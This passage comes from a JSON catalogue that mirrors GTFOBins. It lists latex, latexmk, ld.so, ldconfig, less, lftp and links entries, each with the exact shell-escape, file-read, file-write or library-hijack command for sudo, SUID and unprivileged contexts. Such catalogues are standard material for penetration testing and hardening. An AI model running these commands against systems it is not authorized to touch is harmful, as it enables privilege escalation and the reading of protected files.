installation","aliases":["xelatex"]},{"id":"gtfo:latex:file-read:0:suid","toolId":"gtfo:latex","toolName":"latex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\nstrings texput.dvi","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:file-read:0:unprivileged","toolId":"gtfo:latex","toolName":"latex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\nstrings texput.dvi","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:file-write:0:sudo","toolId":"gtfo:latex","toolName":"latex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"latex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:file-write:0:suid","toolId":"gtfo:latex","toolName":"latex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"latex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:file-write:0:unprivileged","toolId":"gtfo:latex","toolName":"latex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"latex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:shell:0:sudo","toolId":"gtfo:latex","toolName":"latex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"latex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:shell:0:suid","toolId":"gtfo:latex","toolName":"latex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"latex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:shell:0:unprivileged","toolId":"gtfo:latex","toolName":"latex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"latex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latexmk:file-read:0:sudo","toolId":"gtfo:latexmk","toolName":"latexmk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}' >/path/to/temp-file\nlatexmk -dvi /path/to/temp-file\nstrings temp-file.dvi","description":"The read file will be part of the output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latexmk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:latexmk:file-read:0:unprivileged","toolId":"gtfo:latexmk","toolName":"latexmk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}' >/path/to/temp-file\nlatexmk -dvi /path/to/temp-file\nstrings temp-file.dvi","description":"The read file will be part of the output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latexmk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:latexmk:inherit:0:sudo","toolId":"gtfo:latexmk","toolName":"latexmk","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"latexmk -e '...'","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latexmk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:latexmk:inherit:0:unprivileged","toolId":"gtfo:latexmk","toolName":"latexmk","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"latexmk -e '...'","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latexmk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:latexmk:shell:0:sudo","toolId":"gtfo:latexmk","toolName":"latexmk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"latexmk -pdf -pdflatex='/bin/sh #' /dev/null","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latexmk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:latexmk:shell:0:unprivileged","toolId":"gtfo:latexmk","toolName":"latexmk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"latexmk -pdf -pdflatex='/bin/sh #' /dev/null","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latexmk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ld.so:shell:0:sudo","toolId":"gtfo:ld.so","toolName":"ld.so","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"/path/to/ld.so /bin/sh","description":"The spawned process will be the loader, not the target executable, this might aid evasion. See <https://shyft.us/posts/20230526_linux_command_proxy.html> for more information.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ld.so/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ld.so:shell:0:suid","toolId":"gtfo:ld.so","toolName":"ld.so","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"/path/to/ld.so /bin/sh -p","description":"The spawned process will be the loader, not the target executable, this might aid evasion. See <https://shyft.us/posts/20230526_linux_command_proxy.html> for more information.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ld.so/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ld.so:shell:0:unprivileged","toolId":"gtfo:ld.so","toolName":"ld.so","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"/path/to/ld.so /bin/sh","description":"The spawned process will be the loader, not the target executable, this might aid evasion. See <https://shyft.us/posts/20230526_linux_command_proxy.html> for more information.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ld.so/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ldconfig:library-load:0:sudo","toolId":"gtfo:ldconfig","toolName":"ldconfig","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"echo /path/to/temp-dir/ >/path/to/temp-file\nldconfig -f /path/to/temp-file\nping","description":"This allows to override one or more shared libraries (e.g., `libpcap`) globally, then triggers the execution by running a program that uses it, e.g., `ping`. This is particularly useful if the target binary is SUID. Beware though that it is easy to end up with a broken target system.\n\nFirst identify the shared libraries used by the target program, for example:\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /path/to/temp-dir/libcap.so.2 (0x00007f8417eef000)\n```\n\nThen create the shared library override, named `libcap.so.2`, and put in in `/path/to/temp-dir/`. The program might require some exported symbols from the library override, in that case make sure to add them (e.g., `void cap_get_flag() {}`).","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ldconfig/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ldconfig:library-load:0:suid","toolId":"gtfo:ldconfig","toolName":"ldconfig","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"echo /path/to/temp-dir/ >/path/to/temp-file\nldconfig -f /path/to/temp-file\nping","description":"This allows to override one or more shared libraries (e.g., `libpcap`) globally, then triggers the execution by running a program that uses it, e.g., `ping`. This is particularly useful if the target binary is SUID. Beware though that it is easy to end up with a broken target system.\n\nFirst identify the shared libraries used by the target program, for example:\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /path/to/temp-dir/libcap.so.2 (0x00007f8417eef000)\n```\n\nThen create the shared library override, named `libcap.so.2`, and put in in `/path/to/temp-dir/`. The program might require some exported symbols from the library override, in that case make sure to add them (e.g., `void cap_get_flag() {}`).","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ldconfig/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ldconfig:library-load:0:unprivileged","toolId":"gtfo:ldconfig","toolName":"ldconfig","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"echo /path/to/temp-dir/ >/path/to/temp-file\nldconfig -f /path/to/temp-file\nping","description":"This allows to override one or more shared libraries (e.g., `libpcap`) globally, then triggers the execution by running a program that uses it, e.g., `ping`. This is particularly useful if the target binary is SUID. Beware though that it is easy to end up with a broken target system.\n\nFirst identify the shared libraries used by the target program, for example:\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /path/to/temp-dir/libcap.so.2 (0x00007f8417eef000)\n```\n\nThen create the shared library override, named `libcap.so.2`, and put in in `/path/to/temp-dir/`. The program might require some exported symbols from the library override, in that case make sure to add them (e.g., `void cap_get_flag() {}`).","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ldconfig/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:command:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"cp /path/to/command ~/.lessfilter\nless /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:command:1:sudo","toolId":"gtfo:less","toolName":"less","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"LESSOPEN='/path/to/command # %s' less /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:command:1:unprivileged","toolId":"gtfo:less","toolName":"less","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"LESSOPEN='/path/to/command # %s' less /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:0:sudo","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:0:suid","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"less /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:1:sudo","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /etc/hosts\n:e /path/to/input-file","description":"This can be used to read another file, e.g., when invoked as a pager with some fixed content.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:1:suid","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /etc/hosts\n:e /path/to/input-file","description":"This can be used to read another file, e.g., when invoked as a pager with some fixed content.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:1:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"less /etc/hosts\n:e /path/to/input-file","description":"This can be used to read another file, e.g., when invoked as a pager with some fixed content.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:2:sudo","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"LESSOPEN='echo /path/to/input-file # %s' less /etc/hosts","description":"This can be used to read another file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:2:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"LESSOPEN='echo /path/to/input-file # %s' less /etc/hosts","description":"This can be used to read another file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-write:0:sudo","toolId":"gtfo:less","toolName":"less","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | less\ns/path/to/output-file\nq","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-write:0:suid","toolId":"gtfo:less","toolName":"less","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | less\ns/path/to/output-file\nq","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-write:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | less\ns/path/to/output-file\nq","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:inherit:0:sudo","toolId":"gtfo:less","toolName":"less","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"less /etc/hosts\nv","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:inherit:0:suid","toolId":"gtfo:less","toolName":"less","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"less /etc/hosts\nv","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:inherit:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"less /etc/hosts\nv","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:0:sudo","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"less /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:0:suid","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"less /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"less /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:1:sudo","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"LESSOPEN=\"/bin/sh -s 1>&0 2>&0 # %s\" less /etc/hosts\nreset","description":"The optional `reset` command is needed to receive the echo back of the typed keystrokes.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:1:unprivileged","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"LESSOPEN=\"/bin/sh -s 1>&0 2>&0 # %s\" less /etc/hosts\nreset","description":"The optional `reset` command is needed to receive the echo back of the typed keystrokes.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:2:sudo","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"VISUAL='/bin/sh -s --' less /etc/hosts\nv","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:2:unprivileged","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"VISUAL='/bin/sh -s --' less /etc/hosts\nv","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lftp:shell:0:sudo","toolId":"gtfo:lftp","toolName":"lftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lftp -c '!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lftp:shell:0:suid","toolId":"gtfo:lftp","toolName":"lftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lftp -c '!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lftp:shell:0:unprivileged","toolId":"gtfo:lftp","toolName":"lftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"lftp -c '!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:links:file-read:0:sudo","toolId":"gtfo:links","toolName":"links","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"links /path/to/input-file","description":"The result is displayed in a TUI interface.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/links/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:links:file-read:0:suid","toolId":"gtfo:links","toolName":"links","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"links /path/to/input-file","description":"The result is displayed in a TUI interface.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/links/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 